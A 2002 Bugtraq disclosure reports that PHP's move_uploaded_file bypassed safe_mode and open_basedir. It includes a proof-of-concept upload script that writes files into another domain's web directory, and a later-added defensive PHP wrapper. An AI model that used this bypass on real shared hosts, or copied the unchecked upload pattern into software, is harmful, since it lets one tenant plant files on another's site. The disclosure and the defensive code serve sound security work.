Bugtraq mailing list archives

move_uploaded_file breaks safe_mode restrictions in PHP
From: "Tozz" <tozz () embrace selwerd nl>
Date: Sun, 17 Mar 2002 23:23:34 +0100

Hey

It's possible to circumvent (probably spelled wrong) PHP safe_mode
restrictions by using move_uploaded_file.

You take this nasty script (and you have the domain whatever.com and your
directory path is /domains/whatever.com/):

<?

// PHP 4 era upload handler; $HTTP_POST_FILES and $PHP_SELF come from
// the request under register_globals.
$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];

$size_limit = "100000"; // set size limit in bytes

if ($file) {
    if ($size < $size_limit) {
        // Destination lies outside this vhost's open_basedir on purpose:
        // this is the behaviour the post reports.
        move_uploaded_file($temp,
            "/domains/somebodyelse.org/public_html/www/test/" . $file);
        echo "The file <tt>$file</tt> was successfully uploaded";
    } else {
        echo "Sorry, your file exceeds the size limit of $size_limit bytes";
    }
}

echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>

As you can see, he moved the uploaded file to:
"/domains/somebodyelse.org/public_html/www/test/" while the user is
restricted with both safe_mode and open_basedir.

Virtualhost configuration snippet:

<VirtualHost IP_HERE>
        DocumentRoot /domains/whatever.com/public_html/root/
        ServerName root.whatever.com
        CustomLog /domains/whatever.com/logs/access_log combined
        ErrorLog /domains/whatever.com/logs/error_log
        php_admin_value safe_mode 1
        php_admin_value open_basedir /domains/whatever.com/public_html/root/
</VirtualHost>

As you can see, I have set both safe_mode and the open_basedir
restriction, but this user is able to upload any file to wherever the apache
user has write access.

PHP.net has been notified, and the bug has been fixed in CVS. However, I am unable
to compile the CVS version at the moment; it gives a lot of 'make' errors. Thanks go out
to bastijs for pointing this out to me.

Bye,
Tozz
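The defender's counterpart to the script above, as an added example that is not from the original post or from PHP itself: a wrapper that checks the destination directory against the configured open_basedir before calling move_uploaded_file(), so the write is refused even on a PHP build where move_uploaded_file() does not enforce the restriction. It assumes modern PHP ($_FILES rather than $HTTP_POST_FILES) and an open_basedir such as the one in the VirtualHost snippet.

```php
<?php
// Added example (not from the original post): re-apply the open_basedir
// restriction to the upload destination before move_uploaded_file(), so a
// script cannot write outside its allowed tree. Assumes modern PHP ($_FILES).

function path_within_open_basedir(string $dir): bool
{
    $bases = ini_get('open_basedir');
    if ($bases === false || $bases === '') {
        return false;   // no restriction configured: refuse rather than guess
    }
    $real = realpath($dir);
    if ($real === false) {
        return false;   // destination does not exist or is not reachable
    }
    $real = rtrim($real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // open_basedir may list several directories separated by PATH_SEPARATOR.
    foreach (explode(PATH_SEPARATOR, $bases) as $base) {
        $base = realpath($base);
        if ($base === false) {
            continue;
        }
        $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (strncmp($real, $base, strlen($base)) === 0) {
            return true;    // $real is $base itself or lies beneath it
        }
    }
    return false;
}

function safe_move_upload(array $upload, string $dest_dir): string
{
    if (!isset($upload['tmp_name']) || !is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('not a file uploaded via HTTP POST');
    }
    if (!path_within_open_basedir($dest_dir)) {
        throw new RuntimeException('destination is outside open_basedir');
    }
    $name = basename($upload['name'] ?? '');   // drop client-supplied directory parts
    if ($name === '' || $name === '.' || $name === '..') {
        throw new RuntimeException('invalid file name');
    }
    $target = realpath($dest_dir) . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($upload['tmp_name'], $target)) {
        throw new RuntimeException('move_uploaded_file failed');
    }
    return $target;
}

// Usage (constructed): with the post's open_basedir, the /domains/somebodyelse.org/
// destination is refused; a directory under /domains/whatever.com/public_html/root/ is accepted.
// safe_move_upload($_FILES['file'], '/domains/whatever.com/public_html/root/test');
```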
